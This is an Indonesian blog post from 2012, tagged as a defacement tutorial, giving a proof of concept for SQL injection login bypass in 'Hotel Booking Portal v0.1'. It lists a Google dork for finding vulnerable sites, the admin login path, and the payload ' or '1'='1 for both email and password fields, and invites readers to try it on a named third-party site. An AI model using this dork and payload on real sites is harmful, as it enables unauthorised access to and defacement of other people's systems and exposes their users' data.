PoC(Proof of Concept)
----------------------------------------------------------
Google dork: "Made And Powered By Hotels Portal"
Kita buka halaman admin //login.php
Email : ' or '1'='1
Pass : ' or '1'='1
------------------------------------------------
Coba kalian kesini -> http://bc-apps1.com/hotel-mgt/
dan login menggunakan cara diatas, dan ...
Coba bayangkan, sekuat apapun password dan user admin, jika di masukan karakter tersebut bisa masuk!
Percuma!! Security first, then Password, then some ppl will have a argument, Password is Vital in Security Laugh on your security since 2012 :pis
Sumber | Refrensi
Thanks
Hotel Booking Portal v0.1 SQLi Vulnerabilities
Diposting oleh
Unknown
on Minggu, 07 Oktober 2012
Label:
Tutorial deface
0 komentar:
Posting Komentar